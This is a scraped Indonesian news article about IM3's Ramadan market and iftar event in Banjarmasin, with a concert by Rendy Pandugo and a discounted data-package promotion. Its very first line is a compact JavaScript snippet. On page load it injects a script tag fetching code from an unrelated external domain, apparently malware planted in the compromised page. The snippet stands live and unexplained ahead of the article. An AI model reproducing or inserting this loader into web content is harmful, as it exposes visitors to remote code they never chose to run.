(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Lifestyle

Asyiknya Ngabuburit di Pasar Ramadhan IM3 Banjarmasin, Dihibur Musisi Rendy Pandugo


KANALKALIMANTAN.COM, BANJARMASIN – Momen Ramadhan selalu dinanti seluruh masyarakat di Indonesia. Ragam tradisi di dalamnya membuat masyarakat terhubung satu sama lain.

Menyambut bulan Ramadhan 1444 hijriah, IM3 juga menghadirkan kampanye silaturahmi yang mengajak para pelanggan dan masyarakat untuk kembali merayakan keseruan tradisi Ramadhan.

Diantaranya IM3 mengadakan pasar Ramadhan yang tersebar di 16 titik di Indonesia,  salah satunya di Kota Banjarmasin, tepatnya di Duta Mall Banjarmasin.

Kegiatan pasar Ramadhan IM3 yang berlangsung dari tanggal 25 Maret – 21 April 2023 tersebut diikuti oleh sejumlah UMKM dan diisi oleh berbagai hiburan menarik.

 

Baca juga: ‘Pak Rahmat’ Diserbu Emak-emak di Pasar Murah Ramadhan

Selain cocok menjadi tempat ngabuburit dan buka bersama di food bazar, masyarakat juga dapat mengunjungi Booth IM3 untuk mengikuti berbagai kuis dan game berhadiah voucher hingga Rp 75 juta.

Pada Selasa (28/3/2023) sore, IM3 mengajak puluhan wartawan dari berbagai media online, cetak, dan elektronik di Kota Banjarmasin ikut menikmati keseruan ngabuburit dan buka puasa bersama bareng IM3.

Musisi Rendy Pandugo yang tampil di panggung Pasar Ramadhan IM3 di Duta Mall Banjarmasin, Selasa (28/3/2023) sore. Foto: rizki

Pada kesempatan tersebut pengunjung Pasar Ramadhan IM3 dan para jurnalis dihibur oleh musisi ternama Rendy Pandugo yang membawakan sejumlah lagu-lagu hits sambil menunggu waktu berbuka puasa.

Kegiatan tersebut juga dirangkai dengan acara talk show yang membahas keseruan tradisi Ramadhan bareng IM3, dan ditutup dengan buka puasa bersama.

Tidak sampai disitu, pada bulan Ramadhan kali ini IM3 juga melakukan sidak outlet dan bersilaturahmi ke 2.000 outlet dengan Bus Ramadhan, termasuk ke Kota Banjarmasin untuk memberikan parsel, serta mengajak untuk mengikuti kompetisi branding outlet dengan hadiah sepeda motor.

Baca juga: Bupati Ben Brahim dan Istri Kompak Korupsi, Biayai Politik dari Setoran SKPD, Perkebunan Swasta hingga Membayar Lembaga Survei

Chief Conmercial Officer Indosat Ooredo Hutchison (IOH), Ritesh Kumar Sing mengatakan, IM3 memahami kebutuhan internet masyarakat selama bulan Ramadhan. Untuk itu pihaknya juga memberikan paket spesial bulan Ramadhan.

“Kami hadirkan freedom internet dengan Kouta utama 100G dengan harga Rp 125 ribu (harga normal Rp 150 ribu) agar seluruh pelanggan dapat menikmati momen Ramadhan tanpa khawatir kehabisan Kouta,” ungkapnya.

Dijelaskannya, promo Ramadhan tersebut dapat dinikmati selama 24 jam dan bisa didapatkan dengan mudah hingga 22 April 2023 diberbagai channel pembelia seperti outlet terdekat, IM3 Oficial WhatsApp, e-commerce, convenient store, *123#, dan di aplikasi myIM3. (Kanalkalimantan.com/rizki)

Reporter: rizki
Editor: bie


Al Ghifari

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

5 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

6 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

6 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

6 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

6 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

6 jam ago

This website uses cookies.